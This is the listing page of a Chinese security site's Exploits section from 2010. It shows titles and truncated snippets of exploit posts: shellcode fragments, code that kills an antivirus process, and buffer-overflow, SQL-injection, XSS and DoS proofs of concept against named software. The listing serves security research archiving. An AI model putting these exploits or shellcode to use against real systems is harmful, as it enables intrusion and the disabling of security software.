首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
瑞星最新0day漏洞
  日期:2010-03-25 10:16:34 点击:44 评论:0
编写成程序后双击运行直接K掉瑞星(重起也没用) 以下是漏洞利用代码 ------------------------------------------------------------------------------ DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0; HANDLE hSnapshot = CreateTool
Shellcode - Win32 MessageBox (Metasploit module)
  日期:2010-03-25 10:16:05 点击:267 评论:0
## # $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r rick2600 $ ## # # Installation instructions : # Drop file in framework3/modules/payloads/singles/windows folder # # Usage : ./msfpayload windows/messagebox TITLE=Corelan TEXT=Greetz to c
win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
  日期:2010-03-25 10:15:31 点击:37 评论:0
68 9D 61 F9 77 push 0x77C01345 B8 C7 93 C1 77 mov eax,msvcrt.system FF D0 call eax In msvcrt.dll at 0x77C01344 We have string .cmd, that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and system(cha
Smart PC Recorder 4.8 .MP3 Local Crash POC
  日期:2010-03-25 10:14:49 点击:24 评论:0
# Exploit Title: Smart PC Recorder .MP3 Local Crash POC # Date: March 23, 2010 # Author: chap0 # Software Link: http://www.voiceemotion.com/smartrecorder.htm # Version: Current Version: 4.8 # Tested on: Windows XP SP3/Windows 7 # Cost USD 19.95 #!/u
xwine v1.0.1 (.exe file) Local Crash PoC Exploit
  日期:2010-03-25 10:13:14 点击:27 评论:0
================================================ xwine v1.0.1 (.exe file) Local Crash PoC Exploit ================================================ # xwine v1.0.1 (.exe file) Local Crash PoC Exploit # Install: sudo apt-get install xwine # # Author: Jo
Easy-Clanpage version 2.0 remote profile page blind SQL injection exploit
  日期:2010-03-25 10:11:46 点击:61 评论:0
----------------------------Information------------------------------------------------+Name : Easy-Clanpage = v2.0 Blind SQL Injection Exploit+Autor : Easy Laster+Date : 24.03.2010+Script : Easy-Clanpage v2.0+Download : http://www.easy-clanpage.de/
MX Simulator Server Remote Buffer Overflow PoC
  日期:2010-03-24 12:11:47 点击:44 评论:0
/* MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC This PoC will executes the calc.exe software on the remote system. The bug was discovered by Luigi Auriemma ( www.aluigi.org ) Copyright 2010 Salvatore Fresta aka Drosophila http://www.sal
Jinais IRC Server 0.1.8 - NULL Pointer PoC
  日期:2010-03-24 12:10:54 点击:43 评论:0
/* Jinais IRC Server 0.1.8 - NULL Pointer PoC This PoC will disconnect the affected target IRC server using a NULL Pointer vulnerability. Copyright 2010 Salvatore Fresta aka Drosophila This program is free software; you can redistribute it and/or mo
PDF File Standard Fuzzer
  日期:2010-03-24 12:07:58 点击:110 评论:0
#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # PDF FUZZER -- TAKE IT TO THE HEAD # :) HAVE FUN :) use PDF::Create; use Getopt::Std; @overflow = ('A' x 8200, 'A' x 11000, 'A' x 110000, 'A' x 550000, 'A' x 1100000, 'A'
phpAuthentAdmin permanent XSS
  日期:2010-03-23 10:25:01 点击:38 评论:0
# Exploit Title: phpAuthentAdmin permanent XSS # Date: 2010-03-21 # Author: Yoyahack # Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download # Version: 0.2.1 # Tested on
FreeSSHD 1.2.4 Remote Buffer Overflow DoS
  日期:2010-03-23 10:24:25 点击:81 评论:0
#!/usr/bin/env python # Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS # Date: 22-03-2010 # Author: Pi3rrot - tagazok [At] gmail [D0t] com ak37@freenode # Software Link: http://www.freesshd.com/ # Version: 1.2.4 # Tested on: Windows XP SP3
Donar Player 2.2.0 Local Crash PoC
  日期:2010-03-23 10:18:18 点击:58 评论:0
#!/usr/bin/python # # Title: Donar Player 2.2.0 Local Crash PoC # Date: 03-21-2010 # Author: b0telh0 # Link: http://www.donarzone.com/downloads/donar-player-setup-free.exe # Tested on: Windows XP SP3 crash = x41 * 1000 try: file = open('b0t.wma','w
Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
  日期:2010-03-23 10:17:50 点击:34 评论:0
#!/usr/bin/python # ################################################################################################# # Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit # Date : 23/3/2010 # Bug found by : corelanc0d3r ( htt
RemoteHelp v0.0.7 Denial of Service Exploit
  日期:2010-03-23 10:05:03 点击:45 评论:0
=========================================== RemoteHelp v0.0.7 Denial of Service Exploit =========================================== 0x00 : Vulnerability information -------------------------------- [*] Product : RemoteHelp [*] Version : 0.0.7 [*] Ven
Apple Safari 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)
  日期:2010-03-23 10:03:02 点击:126 评论:0
================================================================ Apple Safari 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash) ================================================================ ?php /*************************************************
Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
  日期:2010-03-22 13:11:28 点击:37 评论:0
#!/usr/bin/python # ############################################################### # Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit # Date : 21/03/2010 # Author : mr_me # Bug found by : sharpe # Version : 3.70 Release
no$gba 2.5c (.nds) local crash
  日期:2010-03-22 13:10:57 点击:41 评论:0
#!/usr/bin/env python #no$gba 2.5c (.nds) local crash #Software Link: http://nocash.emubase.de/no$gba-w.zip #Author: l3D #Site: http://xraysecurity.blogspot.com #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com bad=file('crash.nds', 'w') bad.wri
ZKSoftware Biometric Attendence managnmnet Hardware[MIPS] Improper Authenticatio
  日期:2010-03-22 13:10:11 点击:183 评论:0
# Exploit Title: ZKSoftware Biometric Attendence managnmnet Hardware[MIPS] Improper Authentication. # Date: 20-3-2010 # Author: FB1H2S # Software Link: http://www.esslindia.com/install/eTimeTrack.zip # Version: V2 # Tested on: # category: Remote # C
JITed egg-hunter stage-0 shellcode
  日期:2010-03-22 13:09:47 点击:54 评论:0
//JITed egg-hunter stage-0 shellcode // (Permanent DEP bypass) // // By Alexey Sintsov // dookie@inbox.ru // a.sintsov@dsec.ru // //DSecRG - Digital Security Research Group [dsecrg.com]// // // TAG=3135330731353307 // its mean 0x07333531 twice! // /
eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF
  日期:2010-03-22 13:09:09 点击:43 评论:0
# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF # Type of sploit: Remote Code Execution # Bug found by : loneferret (march 19, 2010) # Reference : http://www.exploit-db.com/exploits/11810 # Exploit date :
共637页/12733条记录 首页 上一页 [383] [384] [385] 386 [387] [388] [389] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved